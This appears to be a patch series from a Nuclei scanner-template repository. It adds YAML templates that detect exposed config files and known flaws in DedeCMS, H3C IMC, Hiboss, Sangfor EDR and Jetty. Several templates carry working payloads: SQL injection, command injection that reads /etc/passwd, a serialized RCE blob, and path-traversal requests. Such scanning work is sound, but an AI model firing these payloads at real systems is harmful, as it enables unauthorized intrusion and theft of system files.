From b62d2c1ccee66511c8f9a2a8553b5699af5b2c88 Mon Sep 17 00:00:00 2001 From: hahwul Date: Sat, 30 Jan 2021 23:27:17 +0900 Subject: [PATCH 0001/4083] added github-page-files --- exposures/files/github-page-files.yaml | 36 ++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposures/files/github-page-files.yaml diff --git a/exposures/files/github-page-files.yaml b/exposures/files/github-page-files.yaml new file mode 100644 index 0000000000..90e8aef0c8 --- /dev/null +++ b/exposures/files/github-page-files.yaml @@ -0,0 +1,36 @@ +id: github-page-files + +info: + name: Github page files + author: hahwul + severity: info + description: Find github page files(_config.yml / CNAME / Gemfile / Gemfile.lock) + +requests: + - method: GET + path: + - "{{BaseURL}}/_config.yml" + - "{{BaseURL}}/CNAME" + - "{{BaseURL}}/Gemfile" + - "{{BaseURL}}/Gemfile.lock" + redirects: true + max-redirects: 1 + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jekyll" + - "plugins" + - "baseurl" + - "gem" + - "github-pages" + - "bundler" + - "github.io" + condition: or From 3a2a99cd630d67405f03d73e62aa8db60c3a542f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Feb 2021 15:43:29 +0000 Subject: [PATCH 0002/4083] Create caucho-resin-information-disclosure.yaml --- .../caucho-resin-information-disclosure.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/caucho-resin-information-disclosure.yaml diff --git a/vulnerabilities/other/caucho-resin-information-disclosure.yaml b/vulnerabilities/other/caucho-resin-information-disclosure.yaml new file mode 100644 index 0000000000..310aaa1174 --- /dev/null +++ b/vulnerabilities/other/caucho-resin-information-disclosure.yaml @@ -0,0 +1,22 @@ +id: Caucho-Resin-Information-Disclosure + +info: + name: Caucho Resin Information Disclosure + author: pikpikcu + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" #ver:3.0.17/3.0.18 + - "{{BaseURL}}/%20../web-inf/web.xml" #ver:3.1.1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "WEB-INF" + part: body From fc3eb4e73eb69458e5146a3fdfcd88b9d4422993 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Feb 2021 23:02:39 +0530 Subject: [PATCH 0003/4083] few updates --- ...tion-disclosure.yaml => caucho-resin-info-disclosure.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename vulnerabilities/other/{caucho-resin-information-disclosure.yaml => caucho-resin-info-disclosure.yaml} (87%) diff --git a/vulnerabilities/other/caucho-resin-information-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml similarity index 87% rename from vulnerabilities/other/caucho-resin-information-disclosure.yaml rename to vulnerabilities/other/caucho-resin-info-disclosure.yaml index 310aaa1174..65b80f7f8d 100644 --- a/vulnerabilities/other/caucho-resin-information-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -1,4 +1,4 @@ -id: Caucho-Resin-Information-Disclosure +id: caucho-resin-info-disclosure info: name: Caucho Resin Information Disclosure @@ -19,4 +19,4 @@ requests: - type: word words: - "WEB-INF" - part: body + part: body \ No newline at end of file From de3338ebb73a136403f08dbe6d0e05992e1deb93 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Feb 2021 23:03:11 +0530 Subject: [PATCH 0004/4083] Update caucho-resin-info-disclosure.yaml --- vulnerabilities/other/caucho-resin-info-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index 65b80f7f8d..47ea854c55 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Caucho Resin Information Disclosure author: pikpikcu severity: info + reference: https://www.exploit-db.com/exploits/27888 requests: - method: GET From 332ccbdb36ae5b9ebc8807a31e7b33c4ab159602 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 15 Mar 2021 08:01:47 +0000 Subject: [PATCH 0005/4083] Create dedecms-membergroup-sqli.yaml --- .../other/dedecms-membergroup-sqli.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/dedecms-membergroup-sqli.yaml diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml new file mode 100644 index 0000000000..33a4710063 --- /dev/null +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml @@ -0,0 +1,26 @@ +id: dedecms-membergroup-sqli + +info: + name: DedeCMS Membergroup SQLI + author: pikpikcu + severity: medium + reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html + tags: sqli,dedecms + +requests: + - method: GET + path: + - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`" + + matchers-condition: and + matchers: + + - type: word + words: + - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + + - type: status + status: + - 200 From 6689aa0a81b647faabf557063fed08d89486bf54 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 15 Mar 2021 08:40:45 +0000 Subject: [PATCH 0006/4083] Create dedecms-carbuyaction-fileinclude.yaml --- .../dedecms-carbuyaction-fileinclude.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml new file mode 100644 index 0000000000..627999c0be --- /dev/null +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -0,0 +1,28 @@ +id: dedecms-carbuyaction-fileinclude + +info: + name: DedeCmsV5.6 Carbuyaction Fileinclude + author: pikpikcu + severity: high + reference: https://www.cnblogs.com/milantgh/p/3615986.html + tags: dedecms + +requests: + - method: GET + path: + - '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../' + headers: + Cookie: code=cod + + matchers-condition: and + matchers: + + - type: word + words: + - "Cod::respond()" + part: body + condition: and + + - type: status + status: + - 200 From 11dec8ac1b3a10c4262388f3de434e006a5eb9a8 Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Wed, 7 Apr 2021 23:11:57 +0300 Subject: [PATCH 0007/4083] Remove Equal I noticed that some vulnerable sites were being missed out since it expected the site to have APP_* which isn't always the case --- exposures/configs/laravel-env.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 7d775e8148..a085df6b32 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -4,7 +4,6 @@ info: name: Laravel .env file author: pxmme1337 & dwisiswant0 & geeknik & emenalf severity: medium - tags: config,exposure requests: - method: GET @@ -18,11 +17,12 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env_1 matchers-condition: and matchers: - type: regex regex: - - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL)=" + - "(NAME|ENV|KEY|DEBUG|URL|PASSWORD)" - type: status status: - 200 From 31f9cf4838b57255de9653189df535a396926b2a Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Wed, 7 Apr 2021 23:17:02 +0300 Subject: [PATCH 0008/4083] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index a085df6b32..c43fe621f0 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -17,7 +17,7 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" - - "{{BaseURL}}/.env_1 + - "{{BaseURL}}/.env_1" matchers-condition: and matchers: - type: regex From af25782bf4a596817c26086778223c7aa5e6f5df Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Thu, 8 Apr 2021 01:22:43 +0300 Subject: [PATCH 0010/4083] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index c43fe621f0..6e15d9fb58 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -17,6 +17,7 @@ requests: - "{{BaseURL}}/.env.example" - "{{BaseURL}}/.env.stage" - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env.old" - "{{BaseURL}}/.env_1" matchers-condition: and matchers: From e5824a72f64ef02c1a0e00669917d27d14f9b584 Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Thu, 8 Apr 2021 01:31:27 +0300 Subject: [PATCH 0011/4083] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 6e15d9fb58..5113b67890 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -19,6 +19,7 @@ requests: - "{{BaseURL}}/.env.live" - "{{BaseURL}}/.env.old" - "{{BaseURL}}/.env_1" + - "{{BaseURL}}/.env_sample" matchers-condition: and matchers: - type: regex From 19914dd2cfeda1ccdbaa436dee0ccc514324bd15 Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Sat, 10 Apr 2021 00:20:35 +0300 Subject: [PATCH 0012/4083] Add files via upload --- exposures/configs/codeigniter-env.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/configs/codeigniter-env.yaml diff --git a/exposures/configs/codeigniter-env.yaml b/exposures/configs/codeigniter-env.yaml new file mode 100644 index 0000000000..b1a1b0c02b --- /dev/null +++ b/exposures/configs/codeigniter-env.yaml @@ -0,0 +1,30 @@ +id: codeigniter-env + +info: + name: Codeigniter .env file + author: emenalf + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/.env" + - "{{BaseURL}}/.env.dev.local" + - "{{BaseURL}}/.env.development.local" + - "{{BaseURL}}/.env.prod.local" + - "{{BaseURL}}/.env.production.local" + - "{{BaseURL}}/.env.local" + - "{{BaseURL}}/.env.example" + - "{{BaseURL}}/.env.stage" + - "{{BaseURL}}/.env.live" + - "{{BaseURL}}/.env_1" + - "{{BaseURL}}/.env.old" + - "{{BaseURL}}/.env_sample" + matchers-condition: and + matchers: + - type: regex + regex: + - "(NAME|ENV|KEY|DEBUG|URL|PASSWORD)" + - type: status + status: + - 200 From 93cb25d1b1cfbbb24edf853eb3da7c243bade0fe Mon Sep 17 00:00:00 2001 From: Alfie Njeru Date: Sat, 10 Apr 2021 00:24:44 +0300 Subject: [PATCH 0013/4083] Update laravel-env.yaml --- exposures/configs/laravel-env.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/laravel-env.yaml b/exposures/configs/laravel-env.yaml index 5113b67890..62a4df78a1 100644 --- a/exposures/configs/laravel-env.yaml +++ b/exposures/configs/laravel-env.yaml @@ -24,7 +24,7 @@ requests: matchers: - type: regex regex: - - "(NAME|ENV|KEY|DEBUG|URL|PASSWORD)" + - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL)=" - type: status status: - 200 From b9e013caec36efe8f852fec8671a20a9072189f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 22 Apr 2021 14:37:32 +0530 Subject: [PATCH 0014/4083] Create sangfor-edr-auth-bypass.yaml --- .../other/sangfor-edr-auth-bypass.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/sangfor-edr-auth-bypass.yaml diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml new file mode 100644 index 0000000000..a52554ef9c --- /dev/null +++ b/vulnerabilities/other/sangfor-edr-auth-bypass.yaml @@ -0,0 +1,25 @@ +id: sangfor-edr-auth-bypass +info: + name: Sangfor EDR Authentication Bypass + author: princechaddha + severity: high + tags: sangfor,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/ui/login.php?user=admin" + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - "/download/edr_installer_" + part: body + - type: word + words: + - 'Set-Cookie=""' + part: header + negative: true From 3e0755cb6a8a8474e3e6ebf3e21d512566c10bed Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 15 May 2021 20:15:52 +0530 Subject: [PATCH 0015/4083] Added Template Validator workflow --- .github/workflows/template-validate.yml | 35 +++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 .github/workflows/template-validate.yml diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml new file mode 100644 index 0000000000..1c8a0982b7 --- /dev/null +++ b/.github/workflows/template-validate.yml @@ -0,0 +1,35 @@ +name: 🛠 Template Validate + +on: [push, pull_request] + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Checkout Repo + uses: actions/checkout@master + + - name: Setup golang + uses: actions/setup-go@v2 + with: + go-version: 1.14 + + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go + + - name: Installing Nuclei + if: steps.cache-go.outputs.cache-hit != 'true' + env: + GO111MODULE: on + run: | + go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + shell: bash + + - name: Template Validation + run: | + nuclei -t . -v + shell: bash \ No newline at end of file From 8959a59bad0a9c72257414dfe201613623ba10e3 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 22 May 2021 21:02:18 +0000 Subject: [PATCH 0016/4083] Update request-headers.txt --- helpers/payloads/request-headers.txt | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/helpers/payloads/request-headers.txt b/helpers/payloads/request-headers.txt index 245e3a39bb..f1ed0df0ba 100644 --- a/helpers/payloads/request-headers.txt +++ b/helpers/payloads/request-headers.txt @@ -48,7 +48,7 @@ Proxy-Connection Proxy-Host Proxy-Url Range -Real-Ip +Real-IP Redirect Referer Referrer @@ -74,6 +74,7 @@ X-Forward-For X-Forwarded X-Forwarded-By X-Forwarded-For +X-Forwarded-For-IP X-Forwarded-For-Original X-Forwarded-Host X-Forwarded-Proto @@ -85,13 +86,16 @@ X-Http-Host-Override X-Http-Method-Override X-Original-Remote-Addr X-Original-Url +X-Originating-IP X-Proxy-Url -X-ProxyUser-Ip -X-Real-Ip +X-ProxyUser-IP +X-Real-IP X-Remote-Addr +X-Remote-IP X-Request-ID X-Requested-With X-Rewrite-Url +X-True-IP X-UIDH X-Wap-Profile X-XSRF-TOKEN From 76886054ce7b7d2d43d8cfd0e98a37eb9af93241 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 05:53:21 +0000 Subject: [PATCH 0017/4083] Create h3c-imc-rce.yaml --- vulnerabilities/other/h3c-imc-rce.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/h3c-imc-rce.yaml diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml new file mode 100644 index 0000000000..a127111710 --- /dev/null +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -0,0 +1,26 @@ +id: h3c-imc-rce + +info: + name: H3c IMC Rce + author: pikpikcu + severity: critical + reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + tags: rce,h3c-imc + +requests: + - method: POST + path: + - "{{BaseURL}}/imc/javax.faces.resource/dynamiccontent.properties.xhtml" + body: | + pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat%20/etc/passwd + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From be62ea1d42ee5f721f88ff76e3b165e2c920027d Mon Sep 17 00:00:00 2001 From: lu4nx Date: Mon, 31 May 2021 15:06:49 +0800 Subject: [PATCH 0018/4083] Fix: duplication of key "dns" in mapping --- technologies/dns-based-waf-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/dns-based-waf-detect.yaml b/technologies/dns-based-waf-detect.yaml index 0a343d3bc8..64fa8b72a5 100644 --- a/technologies/dns-based-waf-detect.yaml +++ b/technologies/dns-based-waf-detect.yaml @@ -119,7 +119,6 @@ dns: - ".hwwsdns.cn" - ".yunduncname.com" -dns: - name: "{{FQDN}}" type: NS recursion: true From 65c73dbe3470daf94c6383ae06fc433aa662f4a0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:08:16 +0000 Subject: [PATCH 0019/4083] Create hiboss-rce.yaml --- vulnerabilities/other/hiboss-rce.yaml | 35 +++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/other/hiboss-rce.yaml diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml new file mode 100644 index 0000000000..57baac3109 --- /dev/null +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -0,0 +1,35 @@ +id: hiboss-rce + +info: + name: Hiboss RCE + author: pikpikcu + severity: critical + reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 + tags: hiboss,rce + +requests: + - raw: + - | + GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Content-Length: 20 + + - | + GET /poc.txt HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Content-Length: 20 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 1e0a542b2149d5eeaf51784fa06a685dc9270d7d Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:07:03 +0300 Subject: [PATCH 0020/4083] New test --- ...g-information-disclosure-vulnerability.yml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml new file mode 100644 index 0000000000..13374fad92 --- /dev/null +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -0,0 +1,38 @@ +id: jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability + +info: + name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability + author: noamrathaus + severity: high + reference: | + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + description: | + Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. + + This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. + + Impact + This affects all versions of ConcatServlet and WelcomeFilter in versions before 9.4.41, 10.0.3 and 11.0.3. + + Workarounds + If you cannot update to the latest version of Jetty, you can instead deploy your own version of the ConcatServlet and/or the WelcomeFilter by using the code from the latest version of Jetty. + tags: jetty + +requests: + - method: GET + path: + - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "/weaver/" + part: body + - type: word + part: header + words: + - "application/xml" From 27db48cb532b30fce2f919c2d44469e57d1f9204 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:42:41 +0300 Subject: [PATCH 0021/4083] Another vector --- ...vlet-double-decoding-information-disclosure-vulnerability.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml index 13374fad92..fcaa5e2d31 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -22,6 +22,7 @@ requests: - method: GET path: - "{{BaseURL}}/concat?/%2557EB-INF/web.xml" + - "{{BaseURL}}/context/%2e/WEB-INF/web.xml" matchers-condition: and matchers: From 46e4d47d9231776e747a21a510e933c4ebb14e9c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 9 Jun 2021 09:43:04 +0300 Subject: [PATCH 0022/4083] Another reference --- ...vlet-double-decoding-information-disclosure-vulnerability.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml index fcaa5e2d31..cb7e67f6c3 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml @@ -6,6 +6,7 @@ info: severity: high reference: | - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq + - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. From 23cb4c4d9f81760ef03c48cc4e18c7b6b60c2b5a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:37:40 +0530 Subject: [PATCH 0023/4083] moving files around --- .../2021/CVE-2021-28164.yml | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) rename vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml => cves/2021/CVE-2021-28164.yml (74%) diff --git a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml b/cves/2021/CVE-2021-28164.yml similarity index 74% rename from vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml rename to cves/2021/CVE-2021-28164.yml index cb7e67f6c3..db107faa80 100644 --- a/vulnerabilities/other/jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -1,4 +1,4 @@ -id: jetty-utility-servlets-concatservlet-double-decoding-information-disclosure-vulnerability +id: CVE-2021-28164 info: name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability @@ -9,15 +9,8 @@ info: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5 description: | Requests to the ConcatServlet and WelcomeFilter are able to access protected resources within the WEB-INF directory. For example a request to the ConcatServlet with a URI of /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. - This occurs because both ConcatServlet and WelcomeFilter decode the supplied path to verify it is not within the WEB-INF or META-INF directories. It then uses this decoded path to call RequestDispatcher which will also do decoding of the path. This double decoding allows paths with a doubly encoded WEB-INF to bypass this security check. - - Impact - This affects all versions of ConcatServlet and WelcomeFilter in versions before 9.4.41, 10.0.3 and 11.0.3. - - Workarounds - If you cannot update to the latest version of Jetty, you can instead deploy your own version of the ConcatServlet and/or the WelcomeFilter by using the code from the latest version of Jetty. - tags: jetty + tags: cve,cve2021,jetty requests: - method: GET @@ -34,7 +27,8 @@ requests: words: - "/weaver/" part: body + - type: word part: header words: - - "application/xml" + - "application/xml" \ No newline at end of file From eef515820705d623b35fd28ab239727e6c20e4a2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 9 Jun 2021 14:38:12 +0530 Subject: [PATCH 0024/4083] Update CVE-2021-28164.yml --- cves/2021/CVE-2021-28164.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28164.yml b/cves/2021/CVE-2021-28164.yml index db107faa80..975bab47cf 100644 --- a/cves/2021/CVE-2021-28164.yml +++ b/cves/2021/CVE-2021-28164.yml @@ -4,12 +4,12 @@ info: name: Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability author: noamrathaus severity: high - reference: | - - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq - - 